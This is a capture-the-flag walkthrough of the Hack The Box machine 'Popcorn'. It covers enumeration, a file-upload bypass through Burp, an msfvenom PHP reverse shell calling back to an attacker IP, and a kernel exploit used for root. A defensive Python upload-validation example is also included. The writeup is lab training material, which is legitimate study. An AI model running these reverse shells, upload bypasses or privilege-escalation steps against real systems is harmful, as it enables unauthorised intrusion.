Hello guys, today we are going to solve the Popcorn machine on Hack The Box. Machines like this are useful for building skills in penetration testing.

Popcorn is an intermediate-level machine, and it's quite easy to own.

So, let’s get started by scanning the network.

Scanning is the first phase: it finds out which services are running on the machine so that we can look for ones to exploit.

COMMAND: nmap -A 10.10.10.6


From the scan output above, you can see that ports 22 and 80 are open.


Knowing port 80 is open, we browse to the IP in the browser, but don't get any remarkable clue for the next step.

Next, we use Kali's dirb tool to enumerate directories on the IP address. The command we used is dirb http://10.10.10.6. After checking most of the directories, we finally decided to go for the /torrent directory.

So next we explore http://10.10.10.6/torrent/ in the browser, and what we see is the webpage shown below. After looking at the page for some clue, we saw that we need to register on this site first.


After clicking the Register option on the webpage, the registration form opens. As you can see, you need to fill in the details to register on this site.


After successfully registering on the website, click on the Upload option, and the upload page opens. Here we give the path of any torrent file, then click Upload.


When the torrent file is uploaded successfully, we are redirected to the next page. Now simply click on the Edit this torrent option.


As we can see, the torrent file uploaded successfully. We will try to edit the torrent and find a way to upload a shell.

Let's generate a shell with the tool called msfvenom 🙂

COMMAND: msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4444 -f raw

We finally generated a PHP shell. Just copy and paste it into a file and save it as shell.php.

Click the EDIT THIS TORRENT option, upload the shell file and click Submit.

Now the problem is that it won't accept any PHP formats, as a security measure :( So let's change the extension to png.

So let's fire up Burp, bypass the security measure and upload the shell by tampering with the request :)

Just remove the extension .png and forward the request 🙂

BOOM!! The file got uploaded successfully and we bypassed the security measure :)
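The bypass above works because the upload check relied on something the client sends and can rewrite in a proxy. As an added example (not code from this writeup or from the torrent application, and written in Python for illustration), here is a server-side check that ignores the submitted filename and Content-Type, identifies the file from its own bytes, and assigns the stored name itself. The function names, the size limit and the sample inputs are assumptions made for the example.

```python
import secrets

# Magic-byte prefixes of the only formats accepted, mapped to the extension
# the server assigns. The client never chooses the stored extension.
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit for a screenshot


class UploadRejected(Exception):
    """Raised when an upload fails server-side validation."""


def sniff_extension(data: bytes):
    """Return the extension implied by the file's leading bytes, or None."""
    for magic, ext in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def stored_name(client_filename: str, client_content_type: str, data: bytes) -> str:
    """Validate an upload and return the name the server will store it under.

    client_filename and client_content_type are request fields an intercepting
    proxy can rewrite, so they are deliberately not used in any decision.
    """
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    ext = sniff_extension(data)
    if ext is None:
        raise UploadRejected("content is not an allowed image format")
    # Heuristic second layer: refuse image/script polyglots. It can reject a
    # legitimate image that happens to contain these bytes.
    if b"<?php" in data.lower():
        raise UploadRejected("script marker inside image data")
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample inputs (not captured from the target).
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_BYTES = b"<?php /* constructed placeholder body */ ?>"
```

Even with this check in place, the upload directory should be configured so the web server never executes scripts from it.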

Now let's set up a listener in Kali with the help of msfconsole, the Metasploit console.

To get the shell we need the web server to run the PHP shell, which is possible by loading the file in our browser :)

Let's find out where the shell was uploaded on the web server 🙂

After using the dirb tool, I was able to learn that there is an upload folder where all uploaded files are stored 🙂

COMMAND: dirb http://10.10.10.6

Let's check the upload folder by loading it in the browser 🙂

As we can see, the file was uploaded successfully, with a hash value as its name 🙂

Let's try to open the file, and then we get the shell in meterpreter :)

BOOM!! The shell got opened 🙂

Once we have the meterpreter session, we use the command cd /home. Then we check inside the george directory using the command ls /home/george; here we find the user.txt file and read its content, which contains our first FLAG!!

But we can't access higher-level privileges in the shell :(

To get the higher privileges we use an exploit.

Now we searched Google for a kernel exploit and found one that is used for local privilege escalation. We simply downloaded the file to our Desktop.

As you can see, we uploaded it using the command upload /root/Desktop/15704.c. Then we used the command shell to access the root privilege. We compiled it, and next we gave permission to the exploit. Using the cd /root command we found a root.txt file, and to view its contents we used the cat root.txt command. In the end, we found our final FLAG!! 🙂

If you like my writeup, give me Respect on my HTB profile: Exp1o1t9r
